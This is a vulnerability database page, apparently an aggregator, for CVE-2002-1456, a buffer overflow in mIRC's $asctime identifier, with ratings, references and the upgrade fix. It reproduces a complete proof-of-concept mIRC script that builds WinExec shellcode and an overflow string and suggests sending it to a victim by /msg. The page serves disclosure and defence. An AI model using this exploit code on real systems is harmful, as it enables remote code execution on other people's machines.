CVE-2002-1456
CVSS 7.5
Published: 2003-06-09 00:00:00
Revised: 2016-11-28 14:06:22

[Original] Buffer overflow in mIRC 6.0.2 and earlier allows remote attackers to execute arbitrary code via a long $asctime value.


[CNNVD] mIRC Script $asctime Identifier Remote Buffer Overflow Vulnerability (CNNVD-200306-024)

mIRC is an IRC chat client.
The $asctime identifier in mIRC lacks proper checking when parsing strings; a remote attacker can exploit this to trigger a buffer overflow.
mIRC provides a scripting facility for extending the client. The $asctime script identifier, which formats Unix-style timestamps, is vulnerable: it lacks proper checking when handling overlong strings and can overflow a buffer. By causing $asctime to be called with carefully crafted string data, an attacker may execute arbitrary instructions on the system with the privileges of the client.
The scripts bundled with mIRC by default do not call $asctime, but most scripts offered for download by IRC servers can call this identifier.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:khaled_mardam-bey:mirc:6.0.2
cpe:/a:khaled_mardam-bey:mirc:6.0
cpe:/a:khaled_mardam-bey:mirc:6.0.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1456
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1456
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-024
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0092.html
(VENDOR_ADVISORY)  VULNWATCH  20020827 uuuppz.com - Advisory 002 - mIRC $asctime overflow
http://marc.info/?l=bugtraq&m=103046375002380&w=2
(UNKNOWN)  BUGTRAQ  20020827 uuuppz.com - Advisory 002 - mIRC $asctime overflow
http://marc.info/?l=ntbugtraq&m=103046138631893&w=2
(UNKNOWN)  NTBUGTRAQ  20020827 uuuppz.com - Advisory 002 - mIRC $asctime overflow
http://www.mirc.co.uk/whatsnew.txt
(UNKNOWN)  MISC  http://www.mirc.co.uk/whatsnew.txt
http://www.securityfocus.com/bid/5576
(UNKNOWN)  BID  5576
http://xforce.iss.net/xforce/xfdb/9970
(UNKNOWN)  XF  mirc-asctime-bo(9970)

- Vulnerability information

mIRC Script $asctime Identifier Remote Buffer Overflow Vulnerability
High  Boundary Condition Error
2003-06-09 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Temporarily stop using mIRC for IRC chat.
Vendor patch:
Khaled Mardam-Bey
-----------------
The vendor has released an upgrade that fixes this security issue. Download mIRC v6.03 from the vendor's homepage:

http://www.mirc.com/

- Vulnerability information (21759)

mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability (EDBID:21759)
windows remote
2002-08-27 Verified
0 James Martin
N/A
source: http://www.securityfocus.com/bid/5576/info

mIRC is a chat client for the IRC protocol, designed for Microsoft Windows based operating systems. mIRC includes support for a scripting language.

A buffer overflow vulnerability has been reported in the $asctime identifier, a function in the mIRC scripting language. The error lies in the handling of oversized format specifier strings.

Exploitation will rely on a script passing untrusted input to this function. Reportedly, no such script is included in the default installation of mIRC. 

; Proof of concept Code for asctime exploit
; Author: James Martin
; Website: http://www.uuuppz.com
; Email: me@uuuppz.com
;
; Usage:
; /asctime_poc notepad c:\autoexec.nat
; /asctime_poc command.com /c echo Your have been rooted > c:\rooted.txt
; etc :)
;
;
/asctime_poc {
; Set Show State
;
; Valid Values:
; 1 - Show Normal (This will break a ctcp request)
; 2 - Minimise (If your being evil... ;))
; 3 - Maximise
set %showstate 2

; Build Coded Command String
set %command $1-
set %count 1
unset %codedcommand
:loop
set %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command, %count, 1))))
set %count $calc( %count + 1)
if %count <= $len(%command) goto loop 

; Shell Code to Execute
;
; Detects mirc version, decodes the command string then calls winexec
set %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+ $chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24) $+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184) $+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19) $+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+ $chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235) $+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255) $+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate ) $+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+ $chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+ $chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139) $+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+ $str($chr(255),3) 

; Build Exploit String
set %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a, $calc(300-2- $len(%command))) $+ q $+ $chr(17) $+ $chr(64) 

; Run exploit string
;
; In the real world it would be more like
; /msg muppet weirdcommand %exploitstring
echo 1 $asctime(%exploitstring)
}

- Vulnerability information

6405
mIRC asctime Input Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in mIRC. mIRC fails to limit parameters given to asctime(), resulting in a buffer overflow. With a specially crafted request, an attacker can cause the target machine to execute arbitrary code, resulting in a loss of confidentiality and integrity.

- Timeline

2002-08-16 2002-07-30
2002-08-16 Unknown

- Solution

Upgrade to version 6.03 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable scripts or check input on functions that use the asctime() function.

- Vulnerability information

mIRC Scripting ASCTime Buffer Overflow Vulnerability
Class: Boundary Condition Error  Bugtraq ID: 5576
Remote: Yes  Local: No
Published: 2002-08-27 12:00:00  Updated: 2009-07-11 03:56:00
Credit: Discovered by "James Martin" <fulldisclose@uuuppz.com>.

- Affected program versions

Khaled Mardam-Bey mIRC 6.0 2
Khaled Mardam-Bey mIRC 6.0 1
Khaled Mardam-Bey mIRC 6.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home

- Unaffected program versions

Khaled Mardam-Bey mIRC 6.0 3


- Exploit

A proof of concept exploit has been provided by James Martin <fulldisclose@uuuppz.com>:

- Solution

An updated version of mIRC is available:

Khaled Mardam-Bey mIRC 6.0

Khaled Mardam-Bey mIRC 6.0 2

Khaled Mardam-Bey mIRC 6.0 1
